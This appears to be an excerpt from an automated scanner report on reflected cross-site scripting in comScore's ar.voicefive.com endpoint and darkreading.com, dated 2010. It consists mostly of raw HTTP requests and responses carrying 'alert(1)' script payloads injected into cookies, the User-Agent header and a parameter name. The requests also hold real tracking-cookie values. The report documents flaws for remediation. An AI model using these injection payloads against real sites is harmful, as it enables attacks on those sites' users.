User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&f80cc<script>alert(1)</script>16705103bb7; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&f80cc<script>alert(1)</script>16705103bb7', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1292117824";COMSCORE.BMX.Buddy.start(({" ...[SNIP]...
The value of the ar_p43112268 cookie is copied into the HTML document as plain text between tags. The payload 65dca<script>alert(1)</script>c0fad0daf6c was submitted in the ar_p43112268 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&65dca<script>alert(1)</script>c0fad0daf6c; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:00 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... u Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&65dca<script>alert(1)</script>c0fad0daf6c' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1292117820";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p41327062",RecruitFrequency:0,Inv:"inv_300x250",Version:3}],"MasterSettings":{"GlobalCook ...[SNIP]...
The value of the ar_p70821733 cookie is copied into the HTML document as plain text between tags. The payload 149a8<script>alert(1)</script>2a00f6c589d was submitted in the ar_p70821733 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&149a8<script>alert(1)</script>2a00f6c589d; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:02 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... itExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&149a8<script>alert(1)</script>2a00f6c589d', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:4 ...[SNIP]...
The value of the ar_p72213098 cookie is copied into the HTML document as plain text between tags. The payload 9d941<script>alert(1)</script>3c598c502e0 was submitted in the ar_p72213098 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&9d941<script>alert(1)</script>3c598c502e0; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:03 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... n Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&9d941<script>alert(1)</script>3c598c502e0', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1292117823";COMSCORE.BMX.Buddy.start(({" ...[SNIP]...
The value of the ar_p76230671 cookie is copied into the HTML document as plain text between tags. The payload 51b09<script>alert(1)</script>3a421974d11 was submitted in the ar_p76230671 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&51b09<script>alert(1)</script>3a421974d11; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:01 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... ad",C.OnReady.onload); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&51b09<script>alert(1)</script>3a421974d11', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&pr ...[SNIP]...
The value of the ar_p76459327 cookie is copied into the HTML document as plain text between tags. The payload 77352<script>alert(1)</script>17d48bb5b3b was submitted in the ar_p76459327 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&77352<script>alert(1)</script>17d48bb5b3b; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... 5 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&77352<script>alert(1)</script>17d48bb5b3b' }; COMSCORE.BMX.Buddy.ServerTimeEpoch="1292117824";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p41327062",RecruitFrequency:0,Inv:"inv_300x250",Version:3}],"MasterSettings":{"GlobalCook ...[SNIP]...
The value of the ar_p76910469 cookie is copied into the HTML document as plain text between tags. The payload 96153<script>alert(1)</script>6d9153e48df was submitted in the ar_p76910469 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/node.pli?pub=ubm HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&96153<script>alert(1)</script>6d9153e48df; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 01:37:06 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 14211
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={}; }if(typeof(COMSCORE.BMX)=="undef ...[SNIP]... Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&96153<script>alert(1)</script>6d9153e48df', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu000033 ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 268a9"-alert(1)-"3c9be397fb2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.darkreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10268a9"-alert(1)-"3c9be397fb2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.1027. http://www.darkreading.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.darkreading.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b95"><script>alert(1)</script>1552d2f02a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?91b95"><script>alert(1)</script>1552d2f02a5=1 HTTP/1.1
Host: www.darkreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3